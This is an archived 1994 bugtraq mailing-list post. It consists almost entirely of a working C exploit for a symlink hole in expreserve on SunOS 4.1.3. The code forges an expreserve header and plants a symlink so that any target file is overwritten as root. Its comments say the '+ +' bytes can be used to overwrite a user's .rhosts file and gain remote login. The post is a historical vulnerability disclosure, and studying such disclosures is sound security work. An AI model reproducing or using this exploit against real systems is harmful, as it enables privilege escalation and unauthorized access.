[33] in bugtraq
Earlier mail from the bugtraq mailing list... forwarded.
wchuang@ATHENA.MIT.EDU (wchuang@ATHENA.MIT.EDU)
Tue Oct 18 18:39:25 1994
Received: from PACIFIC-CARRIER-ANNEX.MIT.EDU by po6.MIT.EDU (5.61/4.7) id AA1591; Mon, 3 Oct 94 00:23:38 EDT
Received: from villa.fc.net by MIT.EDU with SMTP
id AA27474; Mon, 3 Oct 94 00:23:36 EDT
Received: from freeside.fc.net (freeside.fc.net [198.6.198.2]) by villa.fc.net 8.6.8.1/8.6.6) with ESMTP id PAA00219 for <bugtraq-outgoing@villa.fc.net>; Sun, 2 Oct 1994 15:44:22 -0500
Received: (from majordom@localhost) by freeside.fc.net (8.6.8.1/8.6.6) id PAA2217 for bugtraq-outgoing@villa.fc.net; Sun, 2 Oct 1994 15:44:51 -0500
Received: from crimelab.crimelab.com (crimelab.crimelab.com [198.64.127.1]) by reeside.fc.net (8.6.8.1/8.6.6) with ESMTP id PAA22304 for <bugtraq@fc.net>; Sun, 2 Oct 1994 15:44:39 -0500
Received: from relay1.Hawaii.Edu (relay1.Hawaii.Edu [128.171.41.53]) by crimela.crimelab.com (8.6.9/8.6.4) with SMTP id PAA01995 for <bugtraq@crimelab.com>; Sun, 2 Oct 1994 15:40:15 -0500
Received: from uhunix.uhcc.Hawaii.Edu ([128.171.44.6]) by relay1.Hawaii.Edu wit SMTP id <11364>; Sun, 2 Oct 1994 08:18:27 -1000
Received: by uhunix.uhcc.Hawaii.Edu id <184397>; Sun, 2 Oct 1994 08:18:15 -1000
Message-Id: <94Oct2.081815hst.184397@uhunix.uhcc.Hawaii.Edu>
From: Tim Newsham <newsham@uhunix.uhcc.hawaii.edu>
To: bugtraq@crimelab.com
Date: Sun, 2 Oct 1994 08:18:10 -1000
Sender: bugtraq-owner@crimelab.com
Precedence: bulk
/*
* Exploit a security hole in expreserve on sun4.1.3
* <program> filename
* overwrites filename as root with garbage, chown's to you
* (note, a 4.1.1 test overwrote with no chown
* the first 4 characters written are "+ +\n"
* which can be used to overwrite anyones .rhosts as root)
*
* Tim N.
*/
#include <pwd.h>
#include <fcntl.h>
#define HBLKS 2
#define FNSIZE 128
#define BLKS 900
typedef struct {
time_t time;
int uid;
int flines;
char name[FNSIZE];
short Blocks[BLKS];
short encrypted;
} header;
main(argc,argv)
int argc;
char **argv;
{
int p,u;
header H;
struct passwd *pw;
char buf[100],*dest;
if(argc!=2) {
printf("usage: %s destination\n",argv[0]);
exit(1);
}
dest = argv[1];
p = getpid();
pw = getpwuid(getuid());
sprintf(buf,"/var/preserve/%s/Exaaa%.5d",pw->pw_name,p);
symlink(dest,buf);
close(0);
if(open("./Ex",O_RDWR|O_CREAT,0666)<0) {
printf("Cant open Ex (temp file)\n");
exit(2);
}
/* fill out header so that expre thinks its legit */
H.time = 12345; /* who cares */
strcpy(&H.time,"+ +\n"); /* its a long, we got some free bytes in there*/
strcpy(H.name,"NoName");
H.flines = 0;
H.uid = getuid();
H.Blocks[0] = HBLKS;
H.Blocks[1] = HBLKS+1;
write(0,&H,sizeof(H));
lseek(0,0,0);
printf("Made temp file 'Ex'. You can remove it when done.\n");
execl("/usr/lib/expreserve","expreserve",0);
printf("Couldnt exec!\n");
}
